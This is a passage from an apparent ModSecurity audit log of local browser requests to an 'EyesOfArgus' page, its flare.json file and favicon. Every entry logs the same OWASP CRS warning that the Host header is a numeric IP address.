\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7DX8AAQEAABwQSCIAAAAD\"]"],"stopwatch":{"p1":638,"p2":967,"p3":108,"p4":494,"p5":66,"sr":33,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCMAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:47 GMT","ETag":"\"295-54f6ab8b53192\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7Dn8AAQEAABwQSCMAAAAD\"]"],"stopwatch":{"p1":420,"p2":977,"p3":96,"p4":199,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCQAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCQAAAAD\"]"],"stopwatch":{"p1":385,"p2":850,"p3":43,"p4":236,"p5":46,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCUAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCUAAAAD\"]"],"stopwatch":{"p1":384,"p2":847,"p3":43,"p4":307,"p5":46,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiHwAAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:57:46 GMT","If-None-Match":"\"ccc-54f6ab8a0710a-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7XH8AAQEAABwRiHwAAAAE\"]"],"stopwatch":{"p1":605,"p2":992,"p3":82,"p4":362,"p5":51,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiH0AAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:57:47 GMT","If-None-Match":"\"295-54f6ab8b53192\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:08 GMT","ETag":"W/\"295-54f6abd8205b9\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7XH8AAQEAABwRiH0AAAAE\"]"],"stopwatch":{"p1":629,"p2":1353,"p3":83,"p4":192,"p5":77,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1kAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc8tn8AAQEAABzhe1kAAAAF\"]"],"stopwatch":{"p1":614,"p2":1044,"p3":58,"p4":319,"p5":63,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1oAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:04:50 GMT","ETag":"\"107-54f6ad1e5f7e6\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc8tn8AAQEAABzhe1oAAAAF\"]"],"stopwatch":{"p1":386,"p2":932,"p3":57,"p4":212,"p5":56,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1sAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1sAAAAF\"]"],"stopwatch":{"p1":596,"p2":1217,"p3":66,"p4":441,"p5":69,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1wAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
